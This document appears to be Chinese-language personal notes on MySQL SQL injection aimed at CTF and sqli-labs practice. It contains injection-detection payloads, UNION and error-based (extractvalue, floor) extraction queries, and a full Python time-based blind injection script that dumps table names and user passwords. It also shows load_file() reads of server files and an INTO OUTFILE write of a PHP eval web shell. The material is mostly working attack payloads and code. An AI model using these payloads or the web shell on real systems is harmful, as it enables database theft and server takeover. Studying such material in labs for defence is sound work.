目录
十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)
经验:
在url注入需要提前进行url编码
如 # -> %23
一.通过 1' #判断是字符型还是数字型
字符型:select * from user where id = '$'
数字型:select * from user where id = $
报错的是 数字型
select * from user where id = 1' #
不报错的是字符型
select * from user where id = '1' #
还有可能需要 1') # 来判断参数有没有括号 引申为
1'))# 1')))# 1"))# 1")))#
#也可能是 --+
二. 查看返回列
order by 1....
select 1,2,3......
三.查数据库名
select database()
四.查表名
select group_concat(table_name) from information_schema.tables where table_schema = database();database() 可以用 '查到的数据库名' 替代
五.查列名
select group_concat(column_name) from information_schema.columns where table_schema = database() and table_name = '$';
六.查数据
select group_concat($1) from $2
select group_concat($11) from $2
三.报错注入常用的两个函数
extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));
#如果返回长度被限制了可以用substr来截取特定的部分, extractvalue中记得用(select flag fron falg) 而不是 直接select flag from flag
select * from news where id=1 and (extractvalue(1,concat(0x7e,substr((select flag from flag),21,40),0x7e)));
floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);
几个小案例:
原句:select ? from user where id = $
-> select ? from user where id = 1 and 1=2 union select group_concat(table_name) from information_schema.tables where table_schema=database()#
//在输入框中就用#,别用--+;因为这里的+不会被解析成空格
//在url栏用--+或者%23,因为#需要被编译为%23才能被识别
时间盲注Python脚本:
"""
使用说明
database_length = database_length() 返回数据库的长度
database_name(a) 传入数据库长度,返回数据库的名字
table_count() 输出表的数量
table_length = table_length() 返回表的长度
table_name(length) 传入表的长度,输出所有表的名字
column_length = column_length() 传入单个表的名字,查询单个表下的列长度
column_name(column_length,table_name) 传入表名,列长度,查询所有列名
flag_length(table_name,column_name) 传入表名,列名,返回数据长度
flag_name(table_name,column_name,flag_length) 传入表名,列名,数据长度,返回数据的值
"""
'''
语法总结:
if($,1,2) $为true,输出1,否则输出2
substr(string,count1,count2) 从count1的位置开始,截取count2个字符 如 substr(string,1,1) == s
ascii(char) 将char转化为ascii码 如 ascii(A) == 65
length(string) 返回字符串长度
database() 返回数据库名字
'''
import requests
import time
base_url="http://127.0.0.1:80/Less-6/?id="
passtime=2
#数据库名的长度
def database_length():
#select * from news where id= 1 and sleep(1)
#if(?,1,2) $为true,输出1,否则输出2
#0 的时候就不行
for i in range(1,45):
#1+and+length%28database%28%29%29+%3D+4+and+sleep%283%29
url=base_url+"1\" and if( length(database())={} , sleep(%s) ,1) --+ ".format(i)%passtime
# 0%27/**/and/**/if( (length(select database())={} , sleep(2) ,1) %23
start_time = time.time()
response = requests.get(url)
end_time = time.time()
if(end_time - start_time > passtime): #说明是对的
print("database_length->",i)
return i
#数据库长度是4
#查数据库的名字
def database_name(length_database):
#截取一个字符,如果是对的就跳到下一个字符
#字符范围为0-9,a-z,A-Z
#ran="abcdefghijklmnopqrstuvwxyz"
result=""
for i in range(1,length_database+1):#控制第几个字符
for j in range(33,124) :
#ascii(substr(database(),{i},1))={j}
url = base_url+"1' and if(ascii(substr(database(),{},1))={},sleep({}),1) --+ ".format(i,j,passtime)
start_time = time.time()
response = requests.get(url)
end_time = time.time()
#print(i,j)
if(end_time - start_time > passtime):
result+=chr(j)
break;
print("database_name->result:", result)
#数据库名为sqli
#跑表名,将表名用group_concat连接后再跑
#表长度
#select group_concat(table_name) from information_schema.tables where table_schema = database()
#length(select group_concat(table_name) from information_schema.tables where table_schema = database())={}
def table_count():
i=0
while True :
#'?id=1 and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(0.5),1)'.format(i)
url = base_url + "1' and if((select count(*) from information_schema.tables where table_schema=database())={},sleep(%s),1) --+"%passtime
real_url = url.format(i)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
print("table_count()->resutlt:",i)
break
else:
#print(i)
i+=1
#两张表
#跑 表名长度
def table_length():
#用group_concat连接再一起后测试长度
#(select group_concat(table_name) from information_schema.tables where table_schema = database())
#length()={}
#if($,sleep(3),1)
i=0
while True:
url=base_url+"1' and if( length( (select group_concat(table_name) from information_schema.tables where table_schema = database()) )={},sleep(%s),1) --+"%passtime
real_url = url.format(i)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
print("table_length()->resutlt:", i)
break
else:
i += 1
return i;
def table_name(table_length):
result=""
for i in range(1,table_length+1):#第n个字符
for j in range(33,127):#ascii
#if($,sleep(3),1)
#ascii()={}
#substr($,{},1)
#(select group_concat(table_name) from information_schema.tables where table_schema=database())
url=base_url+"1' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))={},sleep(%s),1) --+"%passtime
real_url=url.format(i,j)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
result+=chr(j)
print("table_name->result:",result);
break
#字段和表名一样,先跑长度后跑具体字符
def column_length(table_name):
i=0
while True:
#if($,sleep(5),3)
#length()={}
#(select concat(column_name) from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1' and if( length( (select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema=database()) )={},sleep({}),3) --+ "
real_url = url.format(table_name,i,passtime)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
#print(i)
if (end_time - start_time > passtime):
print("column_length->resutlt:", i)
break
else:
#print(i)
i += 1
def column_name(column_length,table_name):
result=""
for i in range(1,column_length+1):
for j in range(33,127):
#if((),sleep(3),1)
#ascii()
#substr((),{},1)
#(select column_name from information_schema.columns where table_name='flag' and table_schema=database())
url=base_url+"1' and if( ascii( substr( (select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema=database()) , {} ,1 ) )={} , sleep({}) , 1) --+"
real_url=url.format(i,j,passtime)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
result+=chr(j)
print("column_name->result", result)
print("column_name->result",result)
#查数据:长度,具体字母
def flag_length(table_name,column_name):
i=0
while True:
url=base_url+"1' and if( ( length( (select group_concat({}) from {}) ) )={},sleep({}),1) --+"
real_url=url.format(column_name,table_name,i,passtime)
start_time=time.time()
response=requests.get(real_url)
end_time=time.time()
if(end_time-start_time>passtime):
print(i)
break
else:
i+=1
def flag_name(table_name,column_name,flag_length):
result=""
for i in range(1,flag_length+1):
for j in range(33,127):
#if((()={}),sleep(3),1)
#ascii()
#substr((),{},1)
#(select flag from flag)
url=base_url+"1' and if( ( ( ascii( substr( ( (select group_concat({}) from {}) ),{},1) ) )={}),sleep({}),1) --+"
real_url=url.format(column_name,table_name,i,j,passtime)
start_time = time.time()
response = requests.get(real_url)
end_time = time.time()
if (end_time - start_time > passtime):
result+=chr(j)
print("flag_name->%s"%column_name,result)
break
if __name__ == "__main__":
database_length = database_length()
#database_name(8)
#table_count() #不是必要的
#table_length = table_length()
#table_name(table_length)
#column_length = column_length("users")
#column_name(20,"users")
#flag_length("users","username")
#flag_name("users", "password", 91)
读写文件操作
前提:该用户具有高权限
读哪些信息?用户信息,账号,密码
select load_file(' 路径 ')
如
select load_file('d:/d.txt')
select load_file('/var/www/html/flag.php')
写什么?写一句话木马
select '<?php @eval($_POST[\'attack\']);?>' into outfile '/var/www/html/aaa.php';